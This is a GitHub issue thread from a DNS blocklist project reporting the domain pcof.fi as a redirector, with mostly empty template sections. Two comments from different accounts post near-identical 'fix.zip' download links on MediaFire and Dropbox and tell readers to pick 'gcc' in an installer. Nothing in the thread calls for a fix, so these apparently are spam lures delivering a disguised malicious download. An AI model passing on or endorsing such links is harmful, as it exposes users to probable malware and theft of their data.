### ISSUE TITLE
pcof.fi

### ISSUE THREAD

**Issue by spirillen** [mypdns/matrix#790]
### Wildcard domain records

```CSV
pcof.fi|redirector
```

### Sub-Domain records

```CSV
null
```

### Hosts (RFC:953) specific records, not used by DNS RPZ firewalls

```CSV
null
```

### SeafeSearch records

```CSV
null
```

### Screenshots

<details><summary>Screenshot</summary>

![image](https://github.com/user-attachments/assets/fc4f9432-230d-4a29-9b67-adc2e78abfb4)

</details>

### Links to external sources

```CSS
null
```

### logs from uBlock Origin

N/A

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
